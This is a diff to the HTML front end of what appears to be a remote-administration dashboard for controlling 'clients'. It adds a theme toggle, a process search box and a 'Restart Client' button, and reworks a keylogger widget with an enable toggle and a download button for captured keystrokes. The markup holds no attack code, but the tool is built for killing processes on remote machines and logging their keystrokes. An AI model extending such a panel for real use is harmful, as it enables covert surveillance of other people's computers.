--- a/frontend/index.html
+++ b/frontend/index.html
@@ -33,7 +33,7 @@
           <span id="header-client-name" class="font-bold text-foreground">Overview</span>
         </div>
         <div class="flex gap-2">
-          <button class="btn btn-sm" id="btn-ping">📡 Network Ping</button>
+          <button class="btn btn-sm" id="btn-theme-toggle" title="Toggle Dark/Light Mode">🌙</button>
         </div>
       </header>
 
@@ -81,7 +81,10 @@
           <div class="widget-card" style="grid-column: span 2;">
             <div class="widget-header">
               <span class="widget-title">⚡ Process Manager</span>
-              <button class="btn btn-sm" id="btn-refresh-tasks">Refresh List</button>
+              <div style="position: relative;">
+                  <input type="text" class="input input-sm" style="width: 200px; padding-right: 30px;" placeholder="Search process..." id="inp-search-proc">
+                  <button id="btn-clear-search" style="position: absolute; right: 5px; top: 50%; transform: translateY(-50%); background: none; border: none; color: var(--muted-foreground); cursor: pointer; display: none;">✕</button>
+              </div>
             </div>
             <div style="max-height: 200px; overflow-y: auto;">
               <table class="task-table">
@@ -106,21 +109,24 @@
             <div class="widget-header">
               <span class="widget-title">🛡️ Security Ops</span>
             </div>
-            <div style="display: flex; gap: 1rem;">
+            <div style="display: flex; gap: 1rem; align-items: center;">
               <button class="btn btn-destructive" id="btn-kill">💀 Kill Selected</button>
+              <button class="btn btn-destructive" id="btn-restart" style="background-color: var(--neon-yellow); color: black;">🔄 Restart Client</button>
               <button class="btn btn-destructive" id="btn-shutdown">🛑 Shutdown Client</button>
-              <div style="flex: 1;"></div>
-              <input type="text" class="input" style="width: 200px;" placeholder="Search process..." id="inp-search-proc">
             </div>
             <!-- Keylogger (Placeholder) -->
             <div style="margin-top: 1rem; border-top: 1px solid var(--border); padding-top: 1rem;">
-                <div style="display: flex; justify-content: space-between; align-items: center; margin-bottom: 0.5rem;">
-                    <h4 style="font-size: 0.75rem; color: var(--muted-foreground); text-transform: uppercase;">Keylogger Feed</h4>
-                    <button class="btn btn-sm" id="btn-keylog-toggle">Enable Keylogger</button>
+                <div class="widget-header" style="margin-bottom: 0.5rem;">
+                    <div class="flex items-center gap-2">
+                        <span class="widget-title">⌨️ Keylogger</span>
+                        <span id="keylog-status" class="text-xs text-muted">Not started</span>
+                    </div>
+                    <div class="flex gap-2">
+                         <button class="btn btn-sm" id="btn-keylog-download" disabled>Download</button>
+                         <button class="btn btn-sm" id="btn-keylog-toggle">Enable Keylogger</button>
+                    </div>
                 </div>
-                <div id="keylog-feed" style="background: black; padding: 0.5rem; border-radius: 4px; font-family: monospace; color: var(--neon-green); height: 60px; overflow-y: auto;">
-                    [System]: Logger initialized...
-                </div>
+                <div id="keylog-feed" class="keylog-feed"></div>
             </div>
           </div>
 
